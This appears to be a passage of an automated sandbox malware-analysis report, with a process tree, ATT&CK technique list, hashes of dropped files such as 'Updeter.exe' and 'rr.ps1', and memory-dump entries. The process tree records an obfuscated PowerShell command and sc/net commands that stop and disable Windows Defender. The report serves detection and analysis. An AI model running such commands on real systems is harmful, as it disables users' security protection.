"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8
5⤵
PID:1868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:1
5⤵
PID:1068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:1
5⤵
PID:3288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4308 /prefetch:8
5⤵
PID:1412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
5⤵
PID:4496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
5⤵
PID:2100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
5⤵
PID:3984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
5⤵
PID:3700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
5⤵
PID:928

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:1
5⤵
PID:336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6844 /prefetch:8
5⤵
PID:1768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6840 /prefetch:1
5⤵
PID:3584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6980 /prefetch:1
5⤵
PID:4240

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7764 /prefetch:8
5⤵
PID:616

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
5⤵
- Drops file in Program Files directory
PID:3108

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7ea355460,0x7ff7ea355470,0x7ff7ea355480
6⤵
PID:5128

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7764 /prefetch:8
5⤵
PID:5352

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:1876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
2⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1544

C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
3⤵
- Launches sc.exe
PID:4040

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
3⤵
PID:5004

C:\Windows\SysWOW64\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2488

C:\Windows\SysWOW64\net1.exe
"C:\Windows\system32\net1.exe" stop windefend
3⤵
PID:720

C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
3⤵
- Launches sc.exe
PID:1976

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1936

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 4976 -ip 4976
1⤵
PID:6008

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
4280e36a29fa31c01e4d8b2ba726a0d8

SHA1
c485c2c9ce0a99747b18d899b71dfa9a64dabe32

SHA256
e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

SHA512
494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tmp.exe.log
Filesize
1KB

MD5
69d71014fdb9e6dcd1758f2c46e07d17

SHA1
5d2622a9855dc131cfe3683e791888dd8aa8cbc9

SHA256
1a8d4efe9e6901bb174a9c665004ac353c2fef126fdd3e08ddffacfe262fa6b4

SHA512
217ef49ac56d9b5c26ebd05731e18f8b9e920a1bfe8f278e2fb1cfce0c0a476a99cae69f0859c1f19926dcb9c23600c71a93f6fa69d2f0bba6bcd21dfc385df2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
0bf8f2ab89fdd0122cb4feab8c6d834f

SHA1
d6d064bceb0c0b974395c64a0beb4559937ce27b

SHA256
63d67c5d596e43949664f137222572cea92080ded57140498588138decc3895c

SHA512
992bb7b3643fb8fab36dda775fba2945953e8bdd1aefbc769ed007ae09bbaa676c0da0dce3d1d7890b3ccdcba92b9efe7348394c1b5fbc7da30cb3eabbdf1d23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
e96938f3913f0ca9766209399c849de9

SHA1
345cc68f93f39be290c6af45283d1e228fc42b3c

SHA256
2e4aa04e6bae5b8f0773e78103126acf37848c00c88c064f3c31f41bafaf2929

SHA512
73e9efbbffe1adab0505c7825f3541a18ece29b6706db50cd0f75080bea34bdf117091256ca68582b6eecca134c3ff227a359c2718a0ca19293b3543dd077530

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
13KB

MD5
8ef804847ea7416d17ad401dde2ae781

SHA1
1bed38b867e5c405bbd6481711a02360bb5934d7

SHA256
b004e341cb506a2e519a837f065a1ca60f542bc7f6c01ded8cce75ab545ae17b

SHA512
f4e2d8d7d5e8b461c51d68096984abf84603f5d92f83e627531ae1816ab540c84733b85b6d7cb9012d04a9af8ca745b421cc9ab516aa0f45c002b8a6dd20727c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
20KB

MD5
0ee816a285be9e95aa811ef8c8c64ad6

SHA1
be7f1e91a84c4de7ca41bc170ac9a0f897296765

SHA256
a5d51177b9c3c9a273650398f9ec1aabe40e9d1e81763d1895894d85e0751963

SHA512
97961ed7a03ddfc456d5561963de9dc2ccf1e3c89b8e5a0b490ed748789e329b31923368dbe892f239aff9bc4e28dac4a2b7543dfea4efaf5364b7f15055f989

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
20KB

MD5
0ee816a285be9e95aa811ef8c8c64ad6

SHA1
be7f1e91a84c4de7ca41bc170ac9a0f897296765

SHA256
a5d51177b9c3c9a273650398f9ec1aabe40e9d1e81763d1895894d85e0751963

SHA512
97961ed7a03ddfc456d5561963de9dc2ccf1e3c89b8e5a0b490ed748789e329b31923368dbe892f239aff9bc4e28dac4a2b7543dfea4efaf5364b7f15055f989

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
477031a32089e6d066092d640b526add

SHA1
5041602c7c71b4c6e40928039dcc07b6b32a67f2

SHA256
0ec3dcb238a28e1b43e2f7b03f955f6304927314c40a51f1d4b2b00345c12bef

SHA512
01388ea1af8248901beb17d1fa62efead2ae1bf9accfc8e132f4f0c0e77c068fd7e998d218043fdc90c497824ca3723689502490da4fd97237a4f0d40ef2bb4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
20KB

MD5
2d12f3d8b096a0fcf88f79dd2c5a93c1

SHA1
5cf3c9f08d9398c8d60e6bc4286d3c1bfcb90540

SHA256
7473d9985ad5eee33541f666d2c3b721532c2686ea7cf704ab53eae47d1fa1f1

SHA512
0326fe2483251418824737387c69d76f3951ee85ca986f28dc15319ddd4b0e0a33cfc874b790c907701ef3712b26fdcc79617089056f5c657b0e1be8e9ff4449

Download Submit
C:\Users\Admin\AppData\Local\Temp\899D.tmp\899E.tmp\899F.bat
Filesize
359B

MD5
c8a31c0b7599a9a2bd7c4500f27ac39e

SHA1
ed3ef80304778e80c1fad8247ed13a075083ef95

SHA256
8f0202e6ceb1e467066aa618ec0f69d859dbb7b3494789472fa5677ba7e926f1

SHA512
5dcabd9404669760488f3e58e85f1c7ca94848001c35175c789f4a2d780e2408db1a9051028072e47a6aaa59aa3e01a0a2388dbc7bf48ddc6c3d8b913cac1dbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updeter.exe
Filesize
120KB

MD5
b677cebc577f2285a16340a73f3e4d39

SHA1
40633e22558a6c728f228515f3097359dbc0458d

SHA256
6d746c5c7f76ca351c64535c2c65fa61593174d726586b339924f25546ac9544

SHA512
a1d2eb1132feb999f463f269f824167618f41d6e5cd567952f4267fbd2f99cdb22884f2d6bad74279a0e70a96b6fd3d9092c49de2af2acc5212892b450576b68

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updeter.exe
Filesize
120KB

MD5
b677cebc577f2285a16340a73f3e4d39

SHA1
40633e22558a6c728f228515f3097359dbc0458d

SHA256
6d746c5c7f76ca351c64535c2c65fa61593174d726586b339924f25546ac9544

SHA512
a1d2eb1132feb999f463f269f824167618f41d6e5cd567952f4267fbd2f99cdb22884f2d6bad74279a0e70a96b6fd3d9092c49de2af2acc5212892b450576b68

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
Filesize
9.7MB

MD5
0974f41ccfe913ecca0e02b69e2a48e2

SHA1
b96e82a039a2024a8c352b6332a582593628bfba

SHA256
7186284537f1f025d1f2e92d6f7b40b0a2de4ecc8a9c5ee96ff90001c38e6a8b

SHA512
60bcd8102e535b0d56ef170609ec6f3c5fcf36ab09e4fcfbf82fe92e77124bc6ee19dae7963b1078424d65010b43a741615ba0dbdce582d6402f8adf97303c8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
Filesize
9.7MB

MD5
0974f41ccfe913ecca0e02b69e2a48e2

SHA1
b96e82a039a2024a8c352b6332a582593628bfba

SHA256
7186284537f1f025d1f2e92d6f7b40b0a2de4ecc8a9c5ee96ff90001c38e6a8b

SHA512
60bcd8102e535b0d56ef170609ec6f3c5fcf36ab09e4fcfbf82fe92e77124bc6ee19dae7963b1078424d65010b43a741615ba0dbdce582d6402f8adf97303c8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\updeter.vbs
Filesize
112KB

MD5
8b50289dfca4b0f572536e3ff6b51b96

SHA1
8fac95861b2803dcae74709b08361c4e89e8ae86

SHA256
0b0c649fca400195a96031b16acc9b002d9556520c7e61f689967fd46eb058c8

SHA512
da5f11ebad71aaa8389f3c250ec06a54ff29b869bb738d6c61eaa7032b359bcfebfdbaa807b886aa02f8d15745f02b1162ef7774457a4911b7b9eb1a20f81acc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\BC9827C99B5A763808B10810DD038DE2DB88A3BB
Filesize
984B

MD5
e53283d76f4a3b7db77ca5dca00c61a7

SHA1
bc25408281c02959260239002a93f8635cce8c48

SHA256
0eb8d99de26e9f8f198c4494d71bef045a038bdcb39030cbeb461ff0b82cbf35

SHA512
edc6b470c2f603cd8ad5bf29dafbb72f3d707e83633ff0b6af28cb479534d61dcd71782a8e43f100225498949c2e174732b3f0cc2edad708cec11d0bca1739ef

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\BC9827C99B5A763808B10810DD038DE2DB88A3BB
Filesize
1012B

MD5
61712957556757a2813b0075c3c96e9e

SHA1
ebe216ab7273cde5e91e1937cfd37c4a402e432e

SHA256
20925c8189fdf5e4ebd770b01d30151934f71eaba5b14cdde1c35dd0950b25f0

SHA512
68f762aba0da7af5e1b31cb9e136ace2ec9805b37e03ad0779d9f663d87fa1554ec46269b18bd19f058902e6d233a3eb9dda98dc492426e6121d6c777f39c28d

Download Submit
C:\Users\Admin\AppData\Roaming\Updeter.exe
Filesize
6KB

MD5
d450f4523f607f01a50b039c83a60422

SHA1
7532dc7f0a86fd1a57d8b766d5673297c649fc68

SHA256
0f4929da9001eab23942eab268ece5da252c8b654273cc6ddaad9f87dcfbb1fa

SHA512
45a88e4adf74d0736004052b30fa8b0445703c7772f8963442179d392f2823e95997d4f5e2237ffa2f655aff784199f33e29ee4156fe199a6dbd3050f6524bf6

Download Submit
C:\Users\Admin\AppData\Roaming\rr.ps1
Filesize
3.1MB

MD5
85ba5955d189df04134dafef32564b86

SHA1
9f063d1b3539855140db17c41f633ccc3c125d10

SHA256
67663d1259adba451b85bddbf5516b51ffc4229e0052e3a83d4e16f06e0feb94

SHA512
6f425f77076d3bbeab945ce3dac446b3da303336754d6c0fbe8dce80dc6d7b61b855ad179f5d6736323193c3108528f4aa042320b38032376bc80ddfbd40459d

Download Submit
\??\pipe\LOCAL\crashpad_4992_QUKFHXDLFNXUYCKJ
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/228-365-0x0000000000000000-mapping.dmp

Download
memory/336-353-0x0000000000000000-mapping.dmp

Download
memory/720-384-0x0000000000000000-mapping.dmp

Download
memory/820-262-0x0000000000000000-mapping.dmp

Download
memory/928-310-0x0000000000000000-mapping.dmp

Download
memory/1068-273-0x0000000000000000-mapping.dmp

Download
memory/1156-170-0x0000000000000000-mapping.dmp

Download
memory/1216-259-0x0000000000000000-mapping.dmp

Download
memory/1276-233-0x0000000000000000-mapping.dmp

Download
memory/1388-171-0x0000000000000000-mapping.dmp

Download
memory/1412-282-0x0000000000000000-mapping.dmp

Download
memory/1544-330-0x0000000000000000-mapping.dmp

Download
memory/1660-169-0x0000000000000000-mapping.dmp

Download
memory/1768-369-0x0000000000000000-mapping.dmp

Download
memory/1868-268-0x0000000000000000-mapping.dmp

Download
memory/1976-385-0x0000000000000000-mapping.dmp

Download
memory/2100-296-0x0000000000000000-mapping.dmp

Download
memory/2280-360-0x0000000000000000-mapping.dmp

Download
memory/2280-373-0x00007FF82C1C0000-0x00007FF82CC81000-memory.dmp

Filesize
10.8MB

Download
memory/2280-366-0x00007FF82C1C0000-0x00007FF82CC81000-memory.dmp

Filesize
10.8MB

Download
memory/2488-372-0x0000000000000000-mapping.dmp

Download
memory/2944-283-0x0000000000000000-mapping.dmp

Download
memory/2976-188-0x0000000000000000-mapping.dmp

Download
memory/3108-396-0x0000000000000000-mapping.dmp

Download
memory/3232-327-0x0000000000000000-mapping.dmp

Download
memory/3288-275-0x0000000000000000-mapping.dmp

Download
memory/3584-376-0x0000000000000000-mapping.dmp

Download
memory/3696-251-0x0000000007040000-0x0000000007062000-memory.dmp

Filesize
136KB

Download
memory/3696-250-0x0000000007190000-0x0000000007226000-memory.dmp

Filesize
600KB

Download
memory/3696-234-0x0000000000000000-mapping.dmp

Download
memory/3700-307-0x0000000000000000-mapping.dmp

Download
memory/3732-342-0x000001EC1FB90000-0x000001EC1FBB2000-memory.dmp

Filesize
136KB

Download
memory/3732-355-0x00007FF82C080000-0x00007FF82CB41000-memory.dmp

Filesize
10.8MB

Download
memory/3732-344-0x00007FF82C080000-0x00007FF82CB41000-memory.dmp

Filesize
10.8MB

Download
memory/3732-337-0x0000000000000000-mapping.dmp

Download
memory/3744-186-0x0000000000000000-mapping.dmp

Download
memory/3984-305-0x0000000000000000-mapping.dmp

Download
memory/4020-166-0x0000000000000000-mapping.dmp

Download
memory/4028-334-0x0000000000000000-mapping.dmp

Download
memory/4040-362-0x0000000000000000-mapping.dmp

Download
memory/4196-303-0x0000000000000000-mapping.dmp

Download
memory/4240-378-0x0000000000000000-mapping.dmp

Download
memory/4308-140-0x00000000060E0000-0x0000000006146000-memory.dmp

Filesize
408KB

Download
memory/4308-141-0x0000000006850000-0x000000000686E000-memory.dmp

Filesize
120KB

Download
memory/4308-136-0x0000000000000000-mapping.dmp

Download
memory/4308-137-0x0000000003280000-0x00000000032B6000-memory.dmp

Filesize
216KB

Download
memory/4308-138-0x0000000005950000-0x0000000005F78000-memory.dmp

Filesize
6.2MB

Download
memory/4308-139-0x0000000006070000-0x00000000060D6000-memory.dmp

Filesize
408KB

Download
memory/4308-143-0x0000000006D50000-0x0000000006D6A000-memory.dmp

Filesize
104KB

Download
memory/4308-142-0x0000000007EF0000-0x000000000856A000-memory.dmp

Filesize
6.5MB

Download
memory/4316-301-0x0000000000000000-mapping.dmp

Download
memory/4404-203-0x00000000078B0000-0x000000000794C000-memory.dmp

Filesize
624KB

Download
memory/4404-189-0x0000000000000000-mapping.dmp

Download
memory/4428-204-0x0000000000000000-mapping.dmp

Download
memory/4428-209-0x0000000000560000-0x0000000000576000-memory.dmp

Filesize
88KB

Download
memory/4496-294-0x0000000000000000-mapping.dmp

Download
memory/4540-374-0x0000000000000000-mapping.dmp

Download
memory/4712-158-0x0000000005E60000-0x0000000006022000-memory.dmp

Filesize
1.8MB

Download
memory/4712-151-0x0000000004880000-0x0000000004892000-memory.dmp

Filesize
72KB

Download
memory/4712-147-0x0000000000000000-mapping.dmp

Download
memory/4712-160-0x00000000062A0000-0x0000000006316000-memory.dmp

Filesize
472KB

Download
memory/4712-161-0x0000000006420000-0x000000000643E000-memory.dmp

Filesize
120KB

Download
memory/4712-148-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4712-153-0x0000000004B80000-0x0000000004C8A000-memory.dmp

Filesize
1.0MB

Download
memory/4712-152-0x00000000048E0000-0x000000000491C000-memory.dmp

Filesize
240KB

Download
memory/4712-159-0x0000000006560000-0x0000000006A8C000-memory.dmp

Filesize
5.2MB

Download
memory/4712-150-0x0000000004EA0000-0x00000000054B8000-memory.dmp

Filesize
6.1MB

Download
memory/4820-258-0x0000000000000000-mapping.dmp

Download
memory/4828-323-0x0000000000000000-mapping.dmp

Download
memory/4948-135-0x00000000072D0000-0x00000000072F2000-memory.dmp

Filesize
136KB

Download
memory/4948-134-0x00000000090C0000-0x0000000009152000-memory.dmp

Filesize
584KB

Download
memory/4948-132-0x0000000000F30000-0x0000000000F38000-memory.dmp

Filesize
32KB

Download
memory/4948-133-0x0000000009570000-0x0000000009B14000-memory.dmp

Filesize
5.6MB

Download
memory/4976-246-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-216-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-260-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-276-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-277-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-261-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-266-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-284-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-288-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-291-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-256-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-144-0x0000000000000000-mapping.dmp

Download
memory/4976-252-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-249-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-302-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-245-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-241-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-240-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-239-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-313-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-314-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-318-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-235-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-154-0x0000000140000000-0x00000001412A5000-memory.dmp

Filesize
18.6MB

Download
memory/4976-324-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-326-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-229-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-228-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-225-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-224-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-220-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-219-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-335-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-269-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-215-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-212-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-211-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-343-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-210-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-348-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
2.0MB

Download
memory/4976-205-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp

Filesize
